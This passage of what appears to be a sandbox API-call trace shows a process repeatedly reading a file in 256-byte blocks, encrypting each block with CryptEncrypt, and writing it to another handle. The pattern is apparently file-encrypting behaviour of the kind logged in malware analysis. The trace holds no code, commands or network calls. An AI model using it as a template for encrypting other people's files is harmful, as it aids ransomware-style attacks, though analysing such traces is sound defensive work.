lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.675] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.675] GetLastError () returned 0x0 [0165.675] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.675] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.675] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.675] GetLastError () returned 0x0 [0165.675] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.675] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.675] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.675] GetLastError () returned 0x0 [0165.675] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.675] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.675] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.675] GetLastError () returned 0x0 [0165.675] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.676] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.676] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.676] GetLastError () returned 0x0 [0165.676] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.676] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.676] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.676] GetLastError () returned 0x0 [0165.676] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.676] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.676] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.676] GetLastError () returned 0x0 [0165.676] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.676] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.676] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.676] GetLastError () returned 0x0 [0165.676] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.676] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.676] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.676] GetLastError () returned 0x0 [0165.676] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.676] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.676] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.676] GetLastError () returned 0x0 [0165.676] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.676] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.676] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.676] GetLastError () returned 0x0 [0165.677] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.677] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.677] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.677] GetLastError () returned 0x0 [0165.677] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.677] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.677] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.677] GetLastError () returned 0x0 [0165.677] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.677] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.677] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.677] GetLastError () returned 0x0 [0165.677] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.677] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.677] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.677] GetLastError () returned 0x0 [0165.677] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.677] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.677] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.677] GetLastError () returned 0x0 [0165.677] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.677] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.677] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.677] GetLastError () returned 0x0 [0165.677] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.677] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.678] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.678] GetLastError () returned 0x0 [0165.678] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.678] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.678] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.678] GetLastError () returned 0x0 [0165.678] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.678] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.678] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.678] GetLastError () returned 0x0 [0165.678] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.678] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.678] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.678] GetLastError () returned 0x0 [0165.678] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.678] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.678] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.678] GetLastError () returned 0x0 [0165.678] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.678] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.678] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.678] GetLastError () returned 0x0 [0165.678] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.678] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.685] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.685] GetLastError () returned 0x0 [0165.685] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.685] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.685] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.686] GetLastError () returned 0x0 [0165.686] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.686] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.686] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.686] GetLastError () returned 0x0 [0165.686] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.686] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.686] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.686] GetLastError () returned 0x0 [0165.686] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.686] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.686] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.686] GetLastError () returned 0x0 [0165.686] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.686] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.686] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.686] GetLastError () returned 0x0 [0165.686] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.686] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.686] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.686] GetLastError () returned 0x0 [0165.686] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.686] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.686] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.686] GetLastError () returned 0x0 [0165.686] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.686] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.687] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.687] GetLastError () returned 0x0 [0165.687] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.687] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, 